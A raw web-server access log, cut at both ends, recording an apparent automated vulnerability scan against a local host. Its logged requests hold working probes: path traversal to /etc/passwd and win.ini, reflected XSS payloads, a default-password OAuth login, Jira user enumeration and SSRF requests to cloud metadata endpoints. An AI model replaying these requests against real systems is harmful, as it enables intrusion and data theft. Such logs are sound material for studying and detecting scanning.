"03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /28fHqV3Ge21qunCaQ3R14HlWqTY HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.012","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.256","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.265","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.448","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.448","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pics/logo_70x29px.gif HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.773","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.391","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.242","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.254","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"SNx8Zvf3","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /functionRouter HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /robots.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.442","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.258","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tips/tipsLogin.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.472","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ws2020/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.418","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.779","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.334","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.378","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /appspec.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.612","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ws2021/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.840","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.321","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.397","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /appspec.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.397","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.255","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /db/server_import.php 